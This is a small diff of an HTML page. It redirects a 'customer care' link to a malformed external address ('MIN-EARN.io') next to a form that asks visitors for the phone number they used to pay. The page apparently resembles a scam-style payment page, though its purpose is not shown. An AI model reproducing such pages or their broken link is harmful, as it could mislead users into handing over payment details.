--- a/index.html
+++ b/index.html
@@ -185,7 +185,7 @@
 				</ol>
 			</div>-->
 
-			<br><br> <a class="btn btn-warning" href="index.html.html">CLICK HERE</a> to talk to customer care </p>
+			<br><br> <a class="btn btn-warning" href=" MIN-EARN.io/index.html.html">CLICK HERE</a> to talk to customer care </p>
 			<form action="/ugandaairnew.php" method="POST" data-validate="parsley">
 			<br><br>
 			<p style="margin-top:0in;margin-right:0in;margin-bottom:8.0pt;margin-left:0in;line-height:107%;font-size:15px;font-family:&quot;Calibri&quot;,sans-serif;">Enter number you used to pay Enter it below and press confirm </p></p>
